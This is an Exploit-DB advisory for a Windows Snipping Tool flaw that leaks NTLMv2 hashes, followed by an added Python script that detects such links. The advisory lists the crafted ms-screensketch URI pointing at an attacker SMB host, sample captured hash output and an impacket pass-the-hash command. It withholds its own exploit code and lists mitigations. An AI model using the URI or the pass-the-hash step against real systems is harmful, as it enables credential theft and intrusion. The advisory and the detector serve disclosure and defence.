
[local] Windows Snipping Tool - NTLMv2 Hash Hijack

Source: Exploit DB. Archived May 15, 2026.



EDB-ID: 52567
CVE: 2026-33829
Author: NU11SECUR1TY
Type: LOCAL
Platform: WINDOWS
Date: 2026-05-15

# Exploit Title: Windows Snipping Tool - NTLMv2 Hash Hijack
# Date: 2026-04-22
# Exploit Author: nu11secur1ty
# Video Demo: https://www.patreon.com/posts/cve-2026-33829-156243398
# Vendor Homepage: https://www.microsoft.com
# Software Link: Built-in Windows Snipping Tool
# Version: Windows 10, Windows 11, Windows Server 2012-2025 (pre-April 2026 patch)
# Tested on: Windows 11 Pro (Build 22621) / Kali Linux 2026.1
# CVE: CVE-2026-33829
# Attack Type: Remote / Network-based
# Impact: Credential Theft (NTLMv2 Hash) / Pass-the-Hash
# CVSS Score: 4.3 (Medium) but HIGH impact in practice

## Vulnerable Systems

- Windows 10 (all versions before April 14, 2026 patch)
- Windows 11 (all versions before April 14, 2026 patch)
- Windows Server 2012, 2016, 2019, 2022, 2025 (before April 14, 2026 patch)

## Description

A vulnerability in Windows Snipping Tool (CVE-2026-33829) allows attackers to force NTLMv2 authentication to a remote SMB server via a crafted ms-screensketch:edit URI. When a victim clicks a malicious link and approves the "Open Snipping Tool" prompt, Windows automatically sends the user's NTLMv2 hash to the attacker-controlled server.

This exploit extends beyond the original PoC by also harvesting HTTP NTLM hashes (via WPAD), LLMNR, and MDNS poisoning, capturing MULTIPLE valid hashes from a SINGLE click. Captured hashes can be used for Pass-the-Hash attacks or cracked with Hashcat.

## Exploit Features (nu11secur1ty edition)

- ✅ Snipping Tool NTLM hash capture (original vector)
- ✅ Automatic HTTP NTLM authentication capture (additional vector)
- ✅ WPAD poisoning (automatic proxy config)
- ✅ LLMNR/MDNS poisoning (fallback vectors)
- ✅ Multi-harvest - captures multiple hashes from one click
- ✅ One-command execution (sudo python3 exploit.py)
- ✅ Auto-detects terminal and opens Responder in new window
- ✅ Built-in HTTP server for HTML delivery

## Proof of Concept

**Video Demonstration (Patreon Exclusive):** https://www.patreon.com/posts/cve-2026-33829-156243398

1. Run exploit on attacker machine (Kali Linux):
   sudo python3 CVE-2026-33829-NTLMv2-Hash-Hijack.py
2. Victim (Windows 11) opens the malicious URL:
   http://<ATTACKER_IP>/exploit.html
3. Victim clicks the button and approves "Open Snipping Tool"
4. Attacker captures NTLMv2 hash(es):
   [HTTP] NTLMv2 Username : \Hacked
   [HTTP] NTLMv2 Hash : Hacked:::157e1f851f7c17e7:16D87BC0AD284FB6...
5. Attacker performs Pass-the-Hash to gain access:
   impacket-psexec -hashes :<HASH> Hacked@<VICTIM_IP>

## Attack Vector

ms-screensketch:edit?filePath=\\<ATTACKER_IP>\test\evil.png

## Requirements

Attacker: Kali Linux (or any Linux with Python3, impacket, responder)
Victim: Windows 10/11 with Snipping Tool (unpatched)

## Mitigations

- Apply Microsoft patch from April 14, 2026
- Block outbound SMB traffic (port 445)
- Disable NTLMv1 and restrict NTLMv2 via GPO
- Educate users not to click "Open Snipping Tool" prompts from untrusted sources

## References

- https://cybersecuritynews.com/windows-snipping-tool-vulnerability/
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829
- https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2026-33829

## Exploit Code (NFO)

The exploit will not be published for security reasons! For more information, please get in touch with me!
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
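
A detection check for the attack vector described above, as an added example that is not part of the original advisory or the author's code: it scans HTML, mail bodies or proxy log lines for ms-screensketch: links whose filePath decodes to a UNC path, including percent-encoded and double-encoded backslashes. The function names and the sample input (documentation addresses 192.0.2.x and example.test) are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

# Any ms-screensketch: URI embedded in HTML, a mail body or a proxy log line.
URI_RE = re.compile(r"ms-screensketch:[^\s\"'<>]+", re.IGNORECASE)
# UNC prefix: two slashes or backslashes, a host, then a separator.
# Accepting forward slashes is a conservative assumption, not from the advisory.
UNC_RE = re.compile(r"^[\\/]{2}(?P<host>[^\\/?]+)[\\/]")

# Constructed sample input (documentation addresses only).
SAMPLE = r'''
<a href="ms-screensketch:edit?filePath=\\192.0.2.10\test\evil.png">Edit</a>
<a href="ms-screensketch:edit?filePath=%5C%5Cfiles.example.test%5Cshare%5Ca.png">x</a>
<a href="ms-screensketch:edit?filePath=%255C%255C192.0.2.11%255Cs%255Cb.png">x</a>
<a href="ms-screensketch:edit?filePath=C:\Users\Public\shot.png">local</a>
'''

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded backslashes are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_screensketch(text):
    """Return one finding per ms-screensketch URI whose filePath is a UNC path."""
    findings = []
    for match in URI_RE.finditer(text):
        uri = html.unescape(match.group(0))  # undo &amp; from HTML attributes
        query = uri.partition("?")[2]
        for pair in query.split("&"):
            key, _, raw = pair.partition("=")
            if key.lower() != "filepath":
                continue
            path = decode_fully(raw)
            unc = UNC_RE.match(path)
            if unc:  # local paths such as C:\... are not flagged
                findings.append({"uri": uri, "host": unc.group("host"), "path": path})
    return findings

if __name__ == "__main__":
    for hit in find_remote_screensketch(SAMPLE):
        print(f"remote filePath -> host {hit['host']}: {hit['uri']}")
```

The reported host can be compared against an allow-list of internal file servers before alerting, which pairs with the outbound SMB block listed under Mitigations.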